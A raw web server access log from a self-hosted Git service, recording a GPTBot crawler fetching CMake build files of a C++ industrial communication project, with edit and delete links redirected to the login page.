"/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 1073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 9907] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10523] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9925] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9915] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 1067] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11441] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9915] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11368] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12392] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 15187] [Gzip 8.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10924] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 1053] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11874] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 1059] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 1055] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 